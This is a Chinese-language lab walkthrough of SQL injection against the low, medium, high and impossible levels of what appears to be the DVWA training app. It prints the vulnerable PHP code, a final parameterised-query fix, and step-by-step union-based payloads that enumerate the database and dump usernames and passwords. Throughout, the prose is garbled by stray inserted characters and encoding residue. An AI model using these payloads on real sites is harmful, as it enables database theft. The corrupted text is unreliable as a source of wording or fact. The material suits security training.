SQL Injection

SQL Injection场钉，即SQL注入，是指攻擊者通過(guò)注入惡意的SQL命令，破壞SQL查詢語(yǔ)句的結(jié)構(gòu)链沼，從而達(dá)到執(zhí)行惡意SQL語(yǔ)句的目的。SQL注入漏洞的危害是巨大的沛鸵，常常會(huì)導(dǎo)致整個(gè)數(shù)據(jù)庫(kù)被“脫褲”括勺，盡管如此，SQL注入仍是現(xiàn)在最常見(jiàn)的Web漏洞之一曲掰。

手工注入思路

自動(dòng)化的注入神器sqlmap固然好用疾捍，但還是要掌握一些手工注入的思路，下面簡(jiǎn)要介紹手工注入（非盲注）的步驟栏妖。

1.判斷是否存在注入乱豆，注入是字符型還是數(shù)字型

2.猜解SQL查詢語(yǔ)句中的字段數(shù)

3.確定顯示的字段順序

4.獲取當(dāng)前數(shù)據(jù)庫(kù)

5.獲取數(shù)據(jù)庫(kù)中的表

6.獲取表中的字段名

7.下載數(shù)據(jù)

low

服務(wù)器代碼：

<?php 

if( isset( $_REQUEST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_REQUEST[ 'id' ]; 

    // Check database 
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' ); 

    // Get results 
    $num = mysql_numrows( $result ); 
    $i   = 0; 
    while( $i < $num ) { 
        // Get values 
        $first = mysql_result( $result, $i, "first_name" ); 
        $last  = mysql_result( $result, $i, "last_name" ); 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 

        // Increase loop count 
        $i++; 
    } 

    mysql_close(); 
} 

?> 

1.首先正常查詢、
2.接著1‘判斷是不是有注入點(diǎn)吊趾。
3.接著用1' or '1'='1 盒 1 or 1=1#查詢是字符型還是數(shù)字型注入宛裕。
4.再來(lái)用order by XXX 查詢字段數(shù)
5.確認(rèn)顯示字段順序（數(shù)據(jù)庫(kù)）1′ union select 1,2 #
6.獲取當(dāng)前數(shù)據(jù)庫(kù)1′ union select 1,database() #
7.獲取數(shù)據(jù)庫(kù)表名union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
8.獲取表中的字段名1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #
9.最后下載數(shù)據(jù)
group_concat(user_id,first_name,last_name),group_concat(password) from users #

medium

服務(wù)器代碼

<?php 

if( isset( $_POST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_POST[ 'id' ]; 
    $id = mysql_real_escape_string( $id ); 

    // Check database 
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' ); 

    // Get results 
    $num = mysql_numrows( $result ); 
    $i   = 0; 
    while( $i < $num ) { 
        // Display values 
        $first = mysql_result( $result, $i, "first_name" ); 
        $last  = mysql_result( $result, $i, "last_name" ); 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 

        // Increase loop count 
        $i++; 
    } 

    //mysql_close(); 
} 

?> 

可以看到房官，它轉(zhuǎn)義了字符\x00,\n,\r,',",\1a，而且
客戶端還有一個(gè)下拉窗口選擇续滋。

選擇的可以通過(guò)抓包修改通過(guò)翰守，因?yàn)榇嬖?數(shù)字型注入，所以轉(zhuǎn)義那些字符就沒(méi)有意義了疲酌。

HIGH

服務(wù)端代碼：

<?php 

if( isset( $_SESSION [ 'id' ] ) ) { 
    // Get input 
    $id = $_SESSION[ 'id' ]; 

    // Check database 
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id LIMIT 1;"; 
    $result = mysql_query( $query ) or die( '<pre>Something went wrong.</pre>' ); 

    // Get results 
    $num = mysql_numrows( $result ); 
    $i   = 0; 
    while( $i < $num ) { 
        // Get values 
        $first = mysql_result( $result, $i, "first_name" ); 
        $last  = mysql_result( $result, $i, "last_name" ); 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 

        // Increase loop count 
        $i++; 
    } 

    mysql_close(); 
} 

?> 

high添加了LIMIT 1蜡峰，希望以此控制只輸出一個(gè)結(jié)果。
我們也可以通過(guò)#將它過(guò)濾朗恳。

需要特別提到的是湿颅，High級(jí)別的查詢提交頁(yè)面與查詢結(jié)果顯示頁(yè)面不是同一個(gè)，也沒(méi)有執(zhí)行302跳轉(zhuǎn)粥诫，這樣做的目的是為了防止一般的sqlmap注入油航，因?yàn)閟qlmap在注入過(guò)程中，無(wú)法在查詢提交頁(yè)面上獲取查詢的結(jié)果怀浆，沒(méi)有了反饋谊囚，也就沒(méi)辦法進(jìn)一步注入。

Impossible

服務(wù)器代碼：

<?php 

if( isset( $_GET[ 'Submit' ] ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    // Get input 
    $id = $_GET[ 'id' ]; 

    // Was a number entered? 
    if(is_numeric( $id )) { 
        // Check the database 
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); 
        $data->bindParam( ':id', $id, PDO::PARAM_INT ); 
        $data->execute(); 
        $row = $data->fetch(); 

        // Make sure only 1 result is returned 
        if( $data->rowCount() == 1 ) { 
            // Get values 
            $first = $row[ 'first_name' ]; 
            $last  = $row[ 'last_name' ]; 

            // Feedback for end user 
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
        } 
    } 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?> 

Impossible級(jí)別的代碼采用了PDO技術(shù)执赡，劃清了代碼與數(shù)據(jù)的界限.同時(shí)只有返回的查詢結(jié)果數(shù)量為一時(shí)镰踏，才會(huì)成功輸出，這樣就有效預(yù)防了“脫褲”.